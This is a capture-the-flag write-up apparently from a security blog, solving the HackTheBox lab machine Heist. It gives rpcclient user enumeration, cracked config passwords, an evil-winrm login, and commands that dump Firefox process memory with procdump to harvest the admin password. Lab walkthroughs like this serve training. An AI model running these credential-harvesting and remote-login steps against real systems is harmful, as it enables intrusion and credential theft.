Heist @ HackTheBox

17Aug

Heist @ HackTheBox

By CTF , , , , ,

Heist is an “easy” machine on HackTheBox, involving some enumeration (especially rpc) and some forensics (dumping firefox memory).

User Flag

Open Ports:

80/tcp  open  http
135/tcp open  msrpc
445/tcp open  microsoft-
5985/tcp open  wsman

On 80/443 is a website where we can click “login as guest”, gather some potential usernames and download an attachment, a configuration file that contains a few secrets:

# usernames
hazard
rout3r
admin
# secrets & decrypted/decoded version
$1$pdQG$o8nrSzsGXeaduXrjlvKc91 : stealth1agent
0242114B0E143F015F5D1E161713 : $uperP@ssword
02375012182C1A1D751618034F36415408 : Q4)sJu\Y8qz*A3?d

We used this website to decrypt the config passwords because they are not really sensitive and use john for the crypt passsword.

We can use hazard:stealth1agent to connect to msrpc and enumerate the other local users on the box:

rpcclient -U "hazard" heist.htb
rpcclient $> lookupnames hazard
hazard S-1-5-21-4254423774-1266059056-3197185112-1008 (User: 1)
rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-1009
S-1-5-21-4254423774-1266059056-3197185112-1009 SUPPORTDESK\support (1)
rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-1012
S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (1)

We can now log into the box after some trial and error as “chase:Q4)sJu\Y8qz*A3?d” via the evilwinrm shell.

evil-winrm -i 10.10.10.149 -u chase -p 'Q4)sJu\Y8qz*A3?d'
*Evil-WinRM* PS C:\Users\Chase\Documents>

The user flag is on the desktop of chase.

Root Flag

One way to root the box is to recognize that firefox is running and then crash it. The admin password will now be in some recovery file in the profile folder:

# Go to AppData\Local\Mozilla\Firefox
Get-ChildItem -recurse | Get-Content | Select-String -pattern "login_password" 2>$null

I did not test this myself as I did not find a way to crash it – if you know how please tell me :)

Another way (the one I actually used) is to dump the process with procdump and then grep through the resulting memory dump:

upload procdump.exe
procdump.exe -accepteula -ma <pid>
Select-String -Path *.dmp -Pattern 'login_password' | out-host -paging

Either way we get the admin password , use it to connect via winrm and get the root flag.

Share this post

Author

Related Posts

16Oct

Dynamic DNS & Command Injection – Dynstr @ HackTheBox

We are solving Dynstr, a 30-point Linux machine on HackTheBox that involves a Dynamic DNS Service & a Command Injection. read more

27Feb

Academy @ HackTheBox

Solving Academy on HackTheBox, a 20-point Linux machine on HackTheBox that involves a Laravel deserialization RCE, stored credentials & sudo... read more

17Jul

LFI to RCE, Sticky Notes & SQLi – Breadcrumbs @ HackTheBox

We are solving Breadcrumbs, a 40-point Windows machine on HackTheBox. For user, we exploit an LFI to read PHP source... read more

11Apr

Traverxec @ HackTheBox

Traverxec is a 20-point machine on hackthebox that involves using a public exploit on the nostromo webserver, cracking the passphrase... read more

25Jan

AI @ HackTheBox

AI is a 30 point machine on hackthebox that involves SQL injection via speech and abusing an exposed java debugging... read more

02Jun

P.O.O. Endgame @ HackTheBox

P.O.O. Endgame is one of HackTheBox’s endgame labs and was just retired. It involves exploiting SQL Server Links & Active... read more

28Dec

InfernoCTF Weakened Keys

"Weakened Keys" was an interesting crypto challenge on InfernoCTF. read more

25May

Luke @ HackTheBox

Luke is a rather short, easy machine on hackthebox, which was nonetheless fun to solve and our team got both... read more

06Jul

Hackback @ HackTheBox

This post is about hackback, a really interesting and challenging machine that was released on 23.02.19 on hackthebox.eu. Techniques used... read more

28Mar

Helpline @ HackThebox

Helpline is a really fun box on hackthebox.eu, which I was lucky enough to get system first blood on :)... read more